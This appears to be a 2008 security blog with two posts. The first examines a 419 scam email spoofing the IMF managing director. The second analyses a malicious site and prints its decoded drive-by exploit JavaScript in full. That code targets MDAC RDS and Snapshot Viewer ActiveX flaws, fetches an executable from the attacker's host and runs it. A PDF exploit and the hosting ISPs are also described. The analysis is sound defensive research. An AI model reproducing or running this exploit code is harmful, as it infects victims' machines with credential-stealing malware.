419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.
The email is spoofed from Mr.Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP 58.63.81.97. The email request the reply go to imfec@in.com.
Delivered-To: xxx@gmail.com Received: by 10.86.95.1 with SMTP id s1cs313745fgb; Sat, 20 Dec 2008 10:36:07 -0800 (PST) Received: by 10.114.145.1 with SMTP id s1mr2802117wad.118.1229798166053; Sat, 20 Dec 2008 10:36:06 -0800 (PST) Return-Path: Received: from pfyq6 ([58.63.81.97]) by mx.google.com with SMTP id k21si16564504waf.32.2008.12.20.10.36.04; Sat, 20 Dec 2008 10:36:06 -0800 (PST) Received-SPF: neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) client-ip=58.63.81.97; Authentication-Results: mx.google.com; spf=neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) smtp.mail=imf@imf.org Message-Id: <494d3b16.15bb720a.7b0f.009fsmtpin_added@mx.google.com> From: "Mr.Dominique Strauss-Kahn" Subject: ECONOMIC STORM To: xxx@gmail.com Content-Type: text/plain; charset="US-ASCII" Reply-To: imfec@in.com Date: Sun, 21 Dec 2008 02:36:04 +0800 X-Priority: 3
This is to inform you/your company that IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world. These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion United State Dollars ) to finance individuals/companies around the globe who have a reasonable project. All applicant should send their full data and project details (project name, project purpose,project cost) to the address given below to apply the support for your project.
Reply to Mr. John Condo Project Finance Section IMF Office Beijing China ( http://www.imf.org/external/np/omd/bios/rrf.htm ) Email imfec@in.com
Yours sincerely, Mr.Dominique Strauss-Kahn Managing Director, IMF
The email attempts to validate itself by including a hyperlink to the bio of Mr.Dominique Strauss-Kahn. The only problem is the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was the former Managing Director from June 7, 2004 to October 31, 2007.
Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. you wouldn't think it's that profitable, but every once in a while, the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is i'm looking forward to my slice of the $10 Billion. WoooHooo!!!
The analysis of exploit code hosted at soft4youupdat.org results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...
A request for http://soft4youupdat.org/counts/index.php returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.
The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is
stringObject.replace(findstring,newstring)
A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.
Exploit Block 1 The first block of exploit code globally replaces the characters Tgwm with the empty string ". The decoded section returns a string of escaped hexadecimal characters.
The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.
az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1; q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send(); t.open(); t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}} Exploit Block 2 The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().
function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://127.0.0.1"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}
Exploit Block 3 The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12 which provides desktop publishing for Linux/Unix. Scribus provides a step by step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.
13 0 obj <> Stream
[filter FlateDecode has been applied to the JavaScript bitstream]
The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).
aut-num: AS36351 as-name: SOFTLAYER descr: SoftLayer Technologies Inc. import: from AS-ANY accept ANY AND NOT {0.0.0.0/0} export: to AS-ANY announce AS36351 admin-c: IPADM258-ARIN tech-c: IPADM258-ARIN notify: noc@softlayer.com mnt-by: MAINT-AS36351 changed: ipadmin@softlayer.com 20060110 source: RADB
SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.
Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1) 67.228.139.0 - 67.228.139.127
SOFTLAYER Technologies Inc is listed by StopBadware.org in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.
